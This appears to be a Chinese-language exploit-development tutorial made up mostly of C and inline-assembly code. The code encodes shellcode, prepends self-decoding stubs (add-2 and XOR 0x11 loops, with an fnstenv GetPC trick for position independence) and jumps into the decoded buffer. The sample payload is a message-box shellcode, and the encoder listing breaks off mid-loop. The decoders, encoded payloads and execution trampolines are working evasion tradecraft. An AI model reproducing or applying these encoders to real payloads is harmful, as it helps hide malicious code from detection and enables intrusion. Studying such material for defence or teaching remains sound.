对shellcode进行加密:
#include "stdio.h"
// Plain (not yet encoded) payload that every example on this page encodes.
// The decoder stubs further down (cmp bl,0x90 / jnz) stop after the first
// byte that decodes to 0x90, so the trailing 0x90 here is the end-of-buffer
// sentinel they look for, not just padding.
char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90";//shellcode should be ended with 0x90 (the decoders' end-of-buffer sentinel)
void encoder (char* input, unsigned char key, int display_flag)// bool display_flag
{
int i=0,len=0;
FILE * fp;
unsigned char * output;
len = strlen(input);
output=(unsigned char *)malloc(len+1);
if(!output)
{
printf("memory erro!\n");
exit(0);
}
//encode the shellcode
for(i=0;i
对shellcode进行解密并运行:
// popup_general with 2 added to every byte (0xFC -> 0xFE, ..., 0x90 -> 0x92).
// The __asm loop that follows reverses this in place with `sub bl,2`, stops
// once a decoded byte equals 0x90, and then transfers control to the decoded
// buffer with push/ret — so the array is both the payload and its own
// terminator.
unsigned char data[] =
"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e"
"\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55"
"\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d"
"\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97"
"\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b"
"\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c"
"\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77"
"\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05"
"\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd"
"\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52"
"\x55\x01\x59\xfe\x55\x01\x59\xfa\x92"; // last byte \x92 decodes to the 0x90 terminator
__asm
{
lea eax,data
xor ecx,ecx
noop:
mov bl, [eax+ecx]
sub bl,2
mov [eax+ecx],bl
inc ecx
cmp bl, 0x90
jnz noop
push eax
ret
}
}
发现能运行后，再将它改为这样:
// Same +2-encoded payload, now prefixed with a 20-byte (0x14) decoder so the
// array is self-contained. The __asm below loads EAX with &data[0];
// `add eax,14` skips this stub, the loop subtracts 2 from each following
// byte in place until it has decoded the 0x90 terminator, and when the jnz
// falls through execution continues at data+20, i.e. the decoded payload.
// NOTE(review): this version assumes EAX points at data[0] on entry; the
// position-independent variant further down removes that assumption.
unsigned char data[] =
"\x83\xC0\x14"// ADD EAX,14  (0x14 = 20 = length of this stub)
"\x33\xC9" // XOR ECX,ECX
"\x8A\x1C\x08" // MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xEB\x02" // SUB BL,2
"\x88\x1C\x08" // MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" // INC ECX
"\x80\xFB\x90" // CMP BL,90
"\x75\xF1"// JNZ SHORT -0x0F, back to the MOV BL above (the original comment quoted a debugger address, shellcod.00401165)
"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e"
"\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55"
"\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d"
"\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97"
"\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b"
"\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c"
"\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77"
"\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05"
"\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd"
"\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52"
"\x55\x01\x59\xfe\x55\x01\x59\xfa\x92\x90"; // \x92 decodes to the 0x90 terminator; the loop exits there, so the final literal \x90 is never rewritten
__asm
{
lea eax,data
push eax
ret
}
}
shellcode加解密完成
但是一般会遇到各种情况，比如插入的shellcode前面还有代码，那么这段我们加密的shellcode就不在最前端，加密的顺序就会出错，因为上面有 add eax,14。
经修改后，可以作为shellcode的中间段使用：
#include "stdafx.h"
#include
// Position-independent variant: instead of relying on EAX already pointing at
// data[0], the stub recovers its own address (fldz / fnstenv / pop eax), so
// the array no longer has to sit at the very start of whatever contains it.
// Encoding here is XOR 0x11 per byte (0xFC ^ 0x11 = 0xED, ..., 0x90 ^ 0x11 = 0x81);
// the loop undoes it in place and, like the earlier stubs, stops at the first
// byte that decodes to 0x90.
unsigned char data[] =
"\xD9\xEE" // fldz  (any FPU instruction; records its own address in the FPU state)
"\xD9\x74\x24\xF4" // fstenv (28-byte) ptr ss:[esp-0xC]  -> the saved FPU instruction pointer (address of the fldz, i.e. data[0]) ends up at [esp]
"\x58" // pop eax: EAX = data[0]. GetPC technique reposted from http://www.programlife.net/shellcode-getpc.html
"\x83\xC0\x1b" // add eax,0x1b  (0x1b = 27 = length of this stub, so EAX now points at the encoded payload)
"\x33\xC9" // XOR ECX,ECX
"\x8A\x1C\x08" // MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x11" // xor bl,0x11  (per-byte key; must match the encoder)
"\x88\x1C\x08" // MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" // INC ECX
"\x80\xFB\x90" // CMP BL,90
"\x75\xF1"// JNZ SHORT -0x0F, back to the MOV BL above (the original comment quoted a debugger address, shellcod.00401165)
//The above is 27 bytes (2+4+1+3+2+3+3+3+1+3+2), which is what add eax,0x1b skips
//The following is 169 bytes
"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d"
"\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42"
"\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a"
"\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84"
"\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48"
"\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b"
"\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64"
"\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12"
"\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca"
"\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41"
"\x42\xee\x46\xed\x42\xee\x46\xe9\x81";//#panda0#  (0x81 ^ 0x11 = 0x90, the terminator the loop waits for)
// Entry point of the demo: hands control to the array with push/ret instead
// of a call, so the decoder stub at data[0] runs next and `return 0` is only
// reached if the code in `data` ever comes back here.
// NOTE(review): the stub rewrites `data` in place and is then executed from
// it, so this presumes the section holding `data` is both writable and
// executable — confirm against the build settings rather than assuming.
int main()
{
__asm
{
lea eax,data   // EAX = &data[0]
push eax
ret            // pops EAX into EIP
}
return 0;
}